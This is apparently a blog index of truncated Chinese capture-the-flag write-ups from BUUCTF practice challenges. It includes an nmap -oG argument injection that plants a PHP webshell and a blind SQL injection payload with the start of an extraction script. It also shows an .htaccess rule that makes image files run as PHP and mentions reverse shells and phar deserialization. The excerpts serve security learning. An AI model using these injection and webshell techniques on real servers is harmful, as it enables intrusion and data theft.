Home

[网鼎杯 2020 朱雀组]Nmap 这题目似曾相识，我知道是nmap 的某个参数可以写入文件然后没想起来具体是啥，谷歌了下就看到wp了 果然如此，写个马进去直接开冲 原理么就是命令执行嘛 源码： $command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host; $result_scan = shell_exec($command); 构造出的命令就是nmap -Pn -T4 -F –host-timeout 1000ms -oX 路径(随机生成的) 127.0.0.1 一句话没php的马 -oG hack.phtml 就行了 [BJDCTF 2nd]xss之光 拿di...

buu摸鱼日记21 [GWCTF 2019]枯燥的抽奖 考的是伪随机，像个misc题， https://github.com/lepiaf/php_mt_seed 工具mark一下 [BJDCTF 2nd]duangShell 居然是反弹shell，大开眼界 读取源码/.index.php.swp <body> <center><h1>珍爱网</h1></center> </body> </html> <?php error_reporting(0); echo "how can i give you source code? .swp?!"."<br>"; i...

buu摸鱼日记之二十 [NCTF2019]Fake XML cookbook 有回显xxe，看着文章一打就出 一个文章看懂XXE [MRCTF2020]PYWebsite 这个简单，扫可以扫出/.DS_Store 里面说有个flag.php 访问说有后端验证，提到ip.XXF打之 得flag [BJDCTF 2nd]Schrödinger 这tm属实脑洞题，建议暴打出题人 进去扫一扫，有test.php，然后让127.0.0.1扫一扫，去除时间base64值，拿到av号，然后是bilibili视频评论区有个flag [BJDCTF2020]EasySearch 这个感觉机器有点问题貌似，明明密码对了还是error 扫出现index.php.swp，这次换了...

buu摸鱼日记19 [极客大挑战 2019]FinalSQL 现在做做，感觉geek题真的很适合入门，不仅不算很难而且确实很有新意 （还是做不来的我是人中屑） 做这个题走了一堆坑，还是修行不到家的结果 1^(ascii(substr((select(group_concat(password))from(geek.F1naI1y)),%d,1))<%d)^1 注意一下括号的书写问题，之前写进行绕过出一堆问题（调了两个小时） import requests url="http://762745cd-b7dc-4d95-9666-f997bed452d5.node3.buuoj.cn/search.php" flag = "" tablename="F1naI1y...

buu摸鱼日记之十八 外卖日记：今天星期一，可能是昨天大家都出去玩了大饱口福的原因，都没有什么点餐。生意很差，只有11单 [GKCTF2020]老八小超市儿 这题有点意思 本来以为是ssrf什么的，并不是 shopxo是一个cms，有洞可以网上找 admin.php有管理页面，标准密码和账号 然后可以通过上传马，换主题来getshell flag所在文件夹无权限，可以利用有root权限的定时脚本来实现 http://8c8003d7-d8b6-47b4-a56a-d4bdf05c29cb.node3.buuoj.cn（我手滑把flag搞没了，又得打一次QWQ） [网鼎杯 2020 朱雀组]phpweb 很有意思的题目 抓包会发现post一个func一个p 测试发...

buu摸鱼日记17 [MRCTF2020]Ez_bypass 简单的索然无味，真的是ez啊 <?php if (isset($_GET['gg']) && isset($_GET['id'])) { $id = $_GET['id']; $gg = $_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if (isset($_POST['passwd'])) { $passwd = $_POST['passwd']; i...

摸鱼日记之十六 https://www.cnblogs.com/chrysanthemum/p/11785453.html [CISCN2019 华北赛区 Day1 Web1]Dropbox 文件任意下载漏洞，但是不能直接下载flag，因为对其做了过滤 关键是审计class，然后构造phar，然后 达成file_get_contents来获取flag

buu摸鱼日记之十五 [MRCTF2020]你传你🐎呢 记录一下，.htaccess用法 概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 这样子，apache就会用php的方法去解析这个马，然后就可以用png马来getshell <FilesMatch "ma.jpg"> SetHandler application/x-httpd-php </FilesMatch> [安洵杯 2019]easy_serialize_php ...